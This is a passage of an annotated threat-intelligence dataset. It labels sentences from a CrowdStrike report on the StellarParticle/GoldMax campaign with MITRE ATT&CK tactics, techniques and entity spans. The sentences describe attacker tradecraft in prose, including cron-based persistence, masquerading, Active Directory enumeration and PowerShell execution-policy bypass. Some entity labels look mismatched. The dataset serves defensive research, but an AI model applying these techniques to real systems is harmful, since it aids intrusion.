TrailBlazer ( .exe ) would be executed when the system's uptime was between 180 and 480 seconds.", "sentence_text": "GoldMax\n(Linux variant)\nAttempted to blend in with a file name that matched the system name it resided on Configured for persistence via a crontab entry with a @reboot line Used likely compromised infrastructure for C2 GoldMax was first observed during post-exploitation activity in the campaign leveraging the SolarWinds supply chain attacks.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.006", "name": "Systemd Timers" } ], "procedure": "Used compromised infrastructure for command-and-control", "entities": [ { "text": "GoldMax\n(Linux variant)", "start": 0, "end": 23, "label": "Infrastructure_Indicator" }, { "text": " compromised infrastructure for C2", "start": 184, "end": 218, "label": "Infrastructure_Indicator" }, { "text": "crontab entry", "start": 139, "end": 152, "label": "MalwareTool" }, { "text": "SolarWinds supply chain attacks", "start": 311, "end": 342, "label": "Infrastructure_Indicator" }, { "text": "Used likely compromised infrastructure for C2 ", "start": 173, "end": 219, "label": "Action" }, { "text": "Attempted to blend in with a file name that matched the system name it resided on", "start": 24, "end": 105, "label": "Action" }, { "text": "Configured for persistence via a crontab entry with a @reboot line", "start": 106, "end": 172, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s59-c7fe9f", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "GoldMax\n(Linux variant)\nAttempted to blend in with a file name that matched the system name it resided on Configured for persistence via a crontab entry with a @reboot line Used likely compromised infrastructure for C2 GoldMax was first observed during post-exploitation activity in the campaign leveraging the SolarWinds supply chain attacks.", "sentence_text": "Previously identified samples of GoldMax were built for the Windows platform, with the earliest identified timestamp indicating a compilation in May 2020, but a recent CrowdStrike investigation discovered a GoldMax variant built for the Linux platform that the threat actor deployed in mid-2019.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Threat actor deployed a Linux variant of GoldMax in mid-2019.", "entities": [ { "text": "threat actor ", "start": 261, "end": 274, "label": "ThreatActor" }, { "text": "GoldMax", "start": 33, "end": 40, "label": "MalwareTool" }, { "text": "GoldMax variant built for the Linux platform ", "start": 207, "end": 252, "label": "MalwareTool" }, { "text": "deployed in mid-2019", "start": 274, "end": 294, "label": "MalwareTool" }, { "text": "Windows platform", "start": 60, "end": 76, "label": "MalwareTool" } ] }, { "uid": "mitre-84_mitre_report-p1-s60-c82b4c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Previously identified samples of GoldMax were built for the Windows platform, with the earliest identified timestamp indicating a compilation in May 2020, but a recent CrowdStrike investigation discovered a GoldMax variant built for the Linux platform that the threat actor deployed in mid-2019.", "sentence_text": "This variant extends the backdoor’s known history and shows that the threat actor has used the malware in post-exploitation activity targeting other platforms than Windows.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Threat actor used the malware during post-exploitation across non-Windows platforms", "entities": [ { "text": "threat actor ", "start": 69, "end": 82, "label": "ThreatActor" }, { "text": "This variant", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": " backdoor’", "start": 24, "end": 34, "label": "MalwareTool" }, { "text": "other platforms than Windows", "start": 143, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "used the malware in post-exploitation activity", "start": 86, "end": 132, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s61-fef6c4", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "This variant extends the backdoor’s known history and shows that the threat actor has used the malware in post-exploitation activity targeting other platforms than Windows.", "sentence_text": "The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s62-09c2c3", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant.", "sentence_text": "The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s63-55c2f1", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections.", "sentence_text": "It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" }, { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "GoldMax was used as a long-term persistence backdoor during StellarParticle-related compromises with minor modifications to support continued functionality and evasion.", "entities": [ { "text": "GoldMax", "start": 13, "end": 20, "label": "MalwareTool" }, { "text": "long-term persistence backdoor", "start": 40, "end": 70, "label": "Action" }, { "text": "StellarParticle", "start": 78, "end": 93, "label": "ThreatActor" } ] }, { "uid": "mitre-84_mitre_report-p1-s64-b5e34e", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality.", "sentence_text": "Persistence was established via a crontab entry for a non-root user.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.003", "name": "Cron" } ], "procedure": "Established persistence using a crontab entry for a non-root user", "entities": [ { "text": "non-root user", "start": 54, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "crontab entry", "start": 34, "end": 47, "label": "MalwareTool" }, { "text": "Persistence was established via a crontab entry for a non-root user.", "start": 0, "end": 68, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s65-28e2b1", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Persistence was established via a crontab entry for a non-root user.", "sentence_text": "With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.003", "name": "Cron" } ], "procedure": "Masqueraded the binary, hid it in a directory, and created a crontab @reboot entry to execute GoldMax on reboot", "entities": [ { "text": "binary ", "start": 9, "end": 16, "label": "MalwareTool" }, { "text": "crontab entry", "start": 107, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "hidden directory", "start": 87, "end": 103, "label": "Infrastructure_Indicator" }, { "text": " legitimate file on the system", "start": 40, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "named to masquerade as a legitimate file", "start": 16, "end": 56, "label": "Action" }, { "text": "placed in a hidden directory", "start": 75, "end": 103, "label": "Action" }, { "text": "crontab entry was created with a @reboot line ", "start": 107, "end": 153, "label": "Action" }, { "text": "execute again upon system reboot", "start": 181, "end": 213, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s66-5ec5d7", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot.", "sentence_text": "GoldMax\npersistence\nEnumeration Tools/Unique Directory Structure Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069.002", "name": "Domain Groups" } ], "procedure": "Used a VBScript-based toolkit to enumerate Active Directory", "entities": [ { "text": "StellarParticle", "start": 80, "end": 95, "label": "ThreatActor" }, { "text": "VBScript-based Active Directory enumeration toolkit", "start": 157, "end": 208, "label": "MalwareTool" }, { "text": "GoldMax", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "Active Directory", "start": 172, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "Active Directory enumeration", "start": 172, "end": 200, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s67-f9b3ee", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "GoldMax\npersistence\nEnumeration Tools/Unique Directory Structure Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit.", "sentence_text": "While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Observed artifacts indicating the same tool was used across StellarParticle engagements", "entities": [ { "text": "StellarParticle engagements", "start": 122, "end": 149, "label": "Action" }, { "text": "script’s contents ", "start": 10, "end": 28, "label": "MalwareTool" }, { "text": "identical artifacts ", "start": 86, "end": 106, "label": "MalwareTool" }, { "text": "tool", "start": 183, "end": 187, "label": "MalwareTool" }, { "text": " tool was used.", "start": 182, "end": 197, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s68-02ece1", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used.", "sentence_text": "In each instance the tool was used, Shellbags data indicated that directories with random names of a consistent length were navigated to by the same user that ran the tool.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Used a tool and navigated to randomly named directories as shown in Shellbags", "entities": [ { "text": "user ", "start": 149, "end": 154, "label": "ThreatActor" }, { "text": "tool.", "start": 167, "end": 172, "label": "MalwareTool" }, { "text": "Shellbags data ", "start": 36, "end": 51, "label": "MalwareTool" }, { "text": " directories with random names of a consistent length", "start": 65, "end": 118, "label": "Action" }, { "text": "tool was used", "start": 21, "end": 34, "label": "Action" }, { "text": "navigated to", "start": 124, "end": 136, "label": "Action" }, { "text": "ran the tool.", "start": 159, "end": 172, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s69-b47922", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "In each instance the tool was used, Shellbags data indicated that directories with random names of a consistent length were navigated to by the same user that ran the tool.", "sentence_text": "After two levels of randomly named directories, Shellbags proved the existence of subdirectories named after the FQDNs for the victims’ various domains.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1074", "name": "Data Staged" } ], "procedure": "Identified subdirectories named after victim FQDNs beyond randomly named directories as shown in Shellbags", "entities": [ { "text": " Shellbags ", "start": 47, "end": 58, "label": "MalwareTool" }, { "text": "andomly named directories", "start": 21, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "subdirectories named after the FQDNs for the victims’ various domains", "start": 82, "end": 151, "label": "Action" }, { "text": "proved the existence of subdirectories named after the FQDNs ", "start": 58, "end": 119, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s70-b93a0d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "After two levels of randomly named directories, Shellbags proved the existence of subdirectories named after the FQDNs for the victims’ various domains.", "sentence_text": "In addition, the randomly named directories are typically created in a previously existing directory that’s one level off of the root of the C drive.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Created randomly named directories under a directory one level below the C drive root.", "entities": [ { "text": " randomly named directories", "start": 16, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "previously existing directory", "start": 71, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "root of the C drive", "start": 129, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "randomly named directories are typically created in a previously existing directory that’s one level off of the root of the C drive", "start": 17, "end": 148, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s71-5d6f97", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "In addition, the randomly named directories are typically created in a previously existing directory that’s one level off of the root of the C drive.", "sentence_text": "The randomly named directories have a consistent length where the first directory is six characters and the next directory is three characters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s72-911f02", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "The randomly named directories have a consistent length where the first directory is six characters and the next directory is three characters.", "sentence_text": "To date, the names of the directories have always been formed from lowercase alphanumeric characters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s73-1ba973", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "To date, the names of the directories have always been formed from lowercase alphanumeric characters.", "sentence_text": "For example, Shellbags indicated that directories matching the naming patterns below were browsed to (where “XX” is a previously existing directory on the system):\nC:\\XX\\{6}\nC:\\XX\\{6}\\{3}\nC:\\XX\\{6}\\{3}\\domain.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Browsed to directories matching attacker naming patterns as shown in Shellbags.", "entities": [ { "text": "Shellbags", "start": 13, "end": 22, "label": "MalwareTool" }, { "text": "C:\\XX\\{6}", "start": 164, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "C:\\XX\\{6}\\{3}", "start": 174, "end": 187, "label": "Infrastructure_Indicator" }, { "text": "C:\\XX\\{6}\\{3}\\domain.", "start": 188, "end": 209, "label": "Infrastructure_Indicator" }, { "text": "previously existing directory on the system", "start": 118, "end": 161, "label": "Infrastructure_Indicator" }, { "text": " browsed to", "start": 89, "end": 100, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s74-c1fb04", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "For example, Shellbags indicated that directories matching the naming patterns below were browsed to (where “XX” is a previously existing directory on the system):\nC:\\XX\\{6}\nC:\\XX\\{6}\\{3}\nC:\\XX\\{6}\\{3}\\domain.", "sentence_text": "FQDN\nC:\\XX\\{6}\\{3}\\domain-2.FQDN", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s75-aea515", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "FQDN\nC:\\XX\\{6}\\{3}\\domain-2.FQDN", "sentence_text": "This evidence typically came from a UserAssist entry for wscript.exe, as well as RecentApps entries for wscript.exe (that would also include the VBScript filename).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s76-9fa299", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "This evidence typically came from a UserAssist entry for wscript.exe, as well as RecentApps entries for wscript.exe (that would also include the VBScript filename).", "sentence_text": "In addition, the Jump List for wscript.exe contained evidence of the VBScript files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s77-b64892", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "In addition, the Jump List for wscript.exe contained evidence of the VBScript files.", "sentence_text": "The name of the VBScript files varied across engagements and was generally designed to look fairly innocuous and blend in.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Used innocuous-looking VBScript file names to blend in", "entities": [ { "text": "VBScript files ", "start": 16, "end": 31, "label": "MalwareTool" }, { "text": "designed to look fairly innocuous and blend in", "start": 75, "end": 121, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s78-2cb91d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "The name of the VBScript files varied across engagements and was generally designed to look fairly innocuous and blend in.", "sentence_text": "Two examples are env.vbs and WinNet.vbs .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s79-b1b0cc", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "Two examples are env.vbs and WinNet.vbs .", "sentence_text": "Due to the subdirectories that are named after the FQDNs for victim domains, CrowdStrike assesses with moderate confidence that the scripts represent an AD enumeration tool used by the adversary.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069.002", "name": "Domain Groups" } ], "procedure": "Used scripts as an AD enumeration tool.", "entities": [ { "text": "the adversary", "start": 181, "end": 194, "label": "ThreatActor" }, { "text": "the scripts", "start": 128, "end": 139, "label": "MalwareTool" }, { "text": "AD enumeration tool ", "start": 153, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "subdirectories", "start": 11, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "FQDNs", "start": 51, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "victim domains", "start": 61, "end": 75, "label": "Infrastructure_Indicator" }, { "text": " AD enumeration tool used by the adversary", "start": 152, "end": 194, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s80-566e4a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "Due to the subdirectories that are named after the FQDNs for victim domains, CrowdStrike assesses with moderate confidence that the scripts represent an AD enumeration tool used by the adversary.", "sentence_text": "Internal Wiki Access Across multiple StellarParticle investigations, CrowdStrike identified unique reconnaissance activities performed by the threat actor: access of victims' internal knowledge repositories.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Accessed victims’ internal knowledge repositories as part of reconnaissance", "entities": [ { "text": "threat actor", "start": 142, "end": 154, "label": "ThreatActor" }, { "text": "victims' internal knowledge repositories", "start": 166, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "identified unique reconnaissance", "start": 81, "end": 113, "label": "Action" }, { "text": " access of victims' internal knowledge repositories", "start": 155, "end": 206, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s81-d5d3c2", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Internal Wiki Access Across multiple StellarParticle investigations, CrowdStrike identified unique reconnaissance activities performed by the threat actor: access of victims' internal knowledge repositories.", "sentence_text": "Wikis are commonly used across industries to facilitate knowledge sharing and as a source of reference for a variety of topics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s82-eb77a6", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "Wikis are commonly used across industries to facilitate knowledge sharing and as a source of reference for a variety of topics.", "sentence_text": "While operating in the victim's internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Accessed sensitive information on the victim’s internal network", "entities": [ { "text": " threat actor ", "start": 53, "end": 67, "label": "ThreatActor" }, { "text": "victim's internal network", "start": 23, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "accessed sensitive information", "start": 67, "end": 97, "label": "Action" }, { "text": "sensitive information", "start": 76, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "products and services that the victim organization provided", "start": 114, "end": 173, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s83-89039b", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "While operating in the victim's internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided.", "sentence_text": "This information included items such as product/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s84-c46a18", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "This information included items such as product/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks.", "sentence_text": "Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "View internal business operation pages including development schedules and points of contact.", "entities": [ { "text": "viewed pages related to internal business operations such as development schedules and points of contact", "start": 31, "end": 135, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s85-ff7878", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact.", "sentence_text": "In some instances these points of contact were subsequently targeted for further data collection.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1589.001", "name": "Credentials" } ], "procedure": "Targeted points of contact for further data collection", "entities": [ { "text": " points of contact ", "start": 23, "end": 42, "label": "Infrastructure_Indicator" }, { "text": " targeted", "start": 59, "end": 68, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s86-b42a7c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "In some instances these points of contact were subsequently targeted for further data collection.", "sentence_text": "The threat actor's wiki access could be considered an extension of \"Credential Hopping\" described earlier.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s87-7de130", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "The threat actor's wiki access could be considered an extension of \"Credential Hopping\" described earlier.", "sentence_text": "The threat actor established RDP sessions to internal servers using privileged accounts and then accessed the wiki using a different set of credentials.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "Established RDP sessions to internal servers using privileged accounts and accessed the wiki with different credentials.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "RDP sessions ", "start": 29, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "internal servers", "start": 45, "end": 61, "label": "Infrastructure_Indicator" }, { "text": " privileged accounts", "start": 67, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "wiki ", "start": 110, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "different set of credentials", "start": 123, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "established RDP sessions", "start": 17, "end": 41, "label": "Action" }, { "text": "accessed the wiki ", "start": 97, "end": 115, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s88-6f1d09", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "The threat actor established RDP sessions to internal servers using privileged accounts and then accessed the wiki using a different set of credentials.", "sentence_text": "At this time, the malicious access of internal wikis is an information gathering technique that CrowdStrike has only observed in StellarParticle investigations.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Maliciously accessed internal wikis for information gathering", "entities": [ { "text": "internal wikis", "start": 38, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "malicious access ", "start": 18, "end": 35, "label": "Action" }, { "text": "information gathering", "start": 59, "end": 80, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s89-98430c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "At this time, the malicious access of internal wikis is an information gathering technique that CrowdStrike has only observed in StellarParticle investigations.", "sentence_text": "Given the threat actor's penchant for clearing browser data, organizations should not rely upon the availability of these artifacts for future investigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s90-dc3b58", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "Given the threat actor's penchant for clearing browser data, organizations should not rely upon the availability of these artifacts for future investigations.", "sentence_text": "CrowdStrike recommends the following best practices for internal information repositories:\nEnable detailed access logging Ensure logs are centralized and stored for at least 180 days Create detections for anomalous activity such as access from an unusual location like a server subnet Enable MFA on the repository site, or provide access via Single Sign On (SSO) behind MFA O365 Built-in Service Principal Hijacking", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s91-edf997", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "CrowdStrike recommends the following best practices for internal information repositories:\nEnable detailed access logging Ensure logs are centralized and stored for at least 180 days Create detections for anomalous activity such as access from an unusual location like a server subnet Enable MFA on the repository site, or provide access via Single Sign On (SSO) behind MFA O365 Built-in Service Principal Hijacking", "sentence_text": "The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "Connected via RDP to a vCenter server, opened PowerShell, and used -ep bypass to circumvent execution policy", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "Remote Desktop ", "start": 31, "end": 46, "label": "MalwareTool" }, { "text": "PowerShell console", "start": 104, "end": 122, "label": "MalwareTool" }, { "text": "PowerShell command -ep bypass", "start": 138, "end": 167, "label": "MalwareTool" }, { "text": "Domain Controller ", "start": 53, "end": 71, "label": "Infrastructure_Indicator" }, { "text": " vCenter server", "start": 75, "end": 90, "label": "Action" }, { "text": "connected via Remote Desktop ", "start": 17, "end": 46, "label": "Action" }, { "text": "opened a PowerShell console", "start": 95, "end": 122, "label": "Action" }, { "text": "circumvent the execution policy.", "start": 171, "end": 203, "label": "Action" }, { "text": "sed the PowerShell command -ep bypass", "start": 130, "end": 167, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s92-d8e8f5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy.", "sentence_text": "Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087.004", "name": "Cloud Account" } ], "procedure": "Connected to the victim’s O365 tenant and performed enumeration queries using the Azure AD PowerShell module.", "entities": [ { "text": "threat actor", "start": 64, "end": 76, "label": "ThreatActor" }, { "text": "Windows Azure Active Directory", "start": 10, "end": 40, "label": "MalwareTool" }, { "text": "PowerShell Module", "start": 41, "end": 58, "label": "MalwareTool" }, { "text": "O365 tenant", "start": 103, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "connected to the victim’s O365 tenant", "start": 77, "end": 114, "label": "Action" }, { "text": "began performing enumeration queries", "start": 119, "end": 155, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s93-fed583", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries.", "sentence_text": "These queries were recorded in text-based logs that existed under the path C:\\Users\\\\AppData\\Local\\Microsoft\\Office365\\Powershell\\ Similar logs (for Azure AD instead of O365) can be found under the path:\nC:\\Users\\\\AppData\\Local\\Microsoft\\AzureAD\\Powershell\\\nWhile the logs didn’t include what data was returned by the queries, they did provide some insight such as the user account used to connect to the victim’s O365 tenant (which was not the same as the user the threat actor used to RDP to the vCenter server).", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Used different accounts to connect to O365 and to RDP into a vCenter server", "entities": [ { "text": "threat actor ", "start": 478, "end": 491, "label": "ThreatActor" }, { "text": "Powershell", "start": 258, "end": 268, "label": "MalwareTool" }, { "text": "C:\\Users\\\\AppData\\Local\\Microsoft\\Office365\\Powershell\\ Simi", "start": 75, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "C:\\Users\\\\AppData\\Local\\Microsoft\\AzureAD\\Powershell\\", "start": 210, "end": 269, "label": "Infrastructure_Indicator" }, { "text": "user account", "start": 381, "end": 393, "label": "Infrastructure_Indicator" }, { "text": "O365 tenant ", "start": 426, "end": 438, "label": "Infrastructure_Indicator" }, { "text": "vCenter server", "start": 510, "end": 524, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s94-addc98", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "These queries were recorded in text-based logs that existed under the path C:\\Users\\\\AppData\\Local\\Microsoft\\Office365\\Powershell\\ Similar logs (for Azure AD instead of O365) can be found under the path:\nC:\\Users\\\\AppData\\Local\\Microsoft\\AzureAD\\Powershell\\\nWhile the logs didn’t include what data was returned by the queries, they did provide some insight such as the user account used to connect to the victim’s O365 tenant (which was not the same as 